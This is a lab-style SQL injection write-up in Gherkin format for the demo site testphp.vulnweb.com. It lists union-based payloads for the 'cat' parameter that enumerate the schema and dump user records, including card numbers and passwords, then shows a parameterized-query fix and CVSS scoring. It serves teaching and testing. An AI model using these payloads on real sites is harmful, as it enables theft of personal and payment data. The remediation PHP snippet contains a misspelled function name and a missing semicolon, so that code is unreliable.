## Version 1.4.1
## language: en

Feature:
  TOE:
    Acuart
  Location:
   http://testphp.vulnweb.com - cat (field)
  CWE:
    CWE-0089: Improper Neutralization of Special Elements used in an SQL Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Detect and exploit vuln Insecure SQL query input
  Recommendation:
    Use parameterized queries with known tools

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Kali Linux      | 2020.3        |
    | Firefox         | 68.10.0esr    |
  TOE information:
    Given I am accessing the site http://testphp.vulnweb.com
    Then Entered a PHP site which uses SQL requests

  Scenario: Normal use case
    Given I access to http://testphp.vulnweb.com/
    When I click on "categories"
    Then I access to http://testphp.vulnweb.com/categories.php/
    And I can see a new page of categories
    When I click on "Posters"
    Then I access to http://testphp.vulnweb.com/listproducts.php?cat=1
    And this can be seen in [evidence](img1.png)

  Scenario: Static detection
    Given I access to http://testphp.vulnweb.com/listproducts.php?cat=1
    When I open the code of the page from the browser inspector
    Then I can't see the website PHP code
    And I can't find possible vulnerabilities

  Scenario: Dynamic detection
    Given I access to http://testphp.vulnweb.com/listproducts.php?cat=1
    When I change the "cat" parameter value from URL
    """
    '
    """
    And this can be seen in [evidence](img2.png)
    Then I reload the page
    And the website shows me a MySQL SQL syntax error
    And this can be seen in [evidence](img3.png)
    Then I can conclude that the "cat" parameter has SQLi vulnerability
    And that the website database is MySQL

  Scenario: Exploitation
    Given I access to http://testphp.vulnweb.com/listproducts.php?cat=1
    When I write the following SQL syntax as a value in "cat" parameter
    """
    1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,(select schema_name from
     (select * from information_schema.schemata) as t limit 1 offset 1)
    """
    Then I can see the database name as can see in [evidence](img4.png)
    When I write the following SQL syntax as a value in "cat" parameter
    """
    1 and 1=2 union select 1,2,3,4,5,6,(select GROUP_CONCAT(table_name)
     from (select * from information_schema.tables WHERE table_schema='acuart')
     as t),8,9,10,(select schema_name from (select *
     from information_schema.schemata) as t limit 1 offset 1)
    """
    Then I can see the tables from acuart database
    And this can be seen in [evidence](img5.png)
    When I write the following SQL syntax as a value in "cat" parameter
    """
    1 and 1=2 union select 1,(select GROUP_CONCAT(column_name) from (select *
     from information_schema.columns where table_name='users') as t),3,4,5,6,
     (select GROUP_CONCAT(table_name) from (select *
     from information_schema.tables WHERE table_schema='acuart') as t),8,9,10,
     (select schema_name from (select * from information_schema.schemata)
     as t limit 1 offset 1)
    """
    Then I can see the attributes from users table
    And this can be seen in [evidence](img6.png)
    When I write the following SQL syntax as a value in "cat" parameter
    """
    1 and 1=2 union select 1,(select GROUP_CONCAT(column_name) from (select *
     from information_schema.columns where table_name='users') as t),3,4,5,6,
     (select concat(address, ",", cart, ",", cc, ",", email, ",", name, ",",
     pass, ",", phone, ",", uname) from (select * from users) as t),8,9,10,
     (select schema_name from (select * from information_schema.schemata)
     as t limit 1 offset 1)
    """
    Then I can see the data of the first record of the users table
    And this can be seen in [evidence](img7.png)

  Scenario: Remediation
    When I use parameterized queries in the back
    Then the program can succesfully avoid most of the known SQLi
    Given I know that the site is PHP and database is MySql
    Then I can use MySqli as tools of parameterized queries
    And I can see an example in the following line
    """
    ...
    $sql = "SELECT email FROM users WHERE username = ? AND password = ?"
    $sqlQuery = mysqli_prepare($connection, $sql);
    $result = mysqli_stmt_bind_param($sqlQuery, "ss", $userValue, $passValue);
    $result = msqli_stmt_execute($sqlQuery);

    if ($result) {
      $result = mysqli_stmt_bind_result($sqlQuery, $email);
      if(mysqli_stmt_fetch($sqlQuery)) {
        echo $email;
      }
    }
    ...
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10.0/10 (Critical) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.5/10 (Critical) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.4/10 (Critical) - CR:L/IR:L/MC:H/MI:H/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2021-03-24
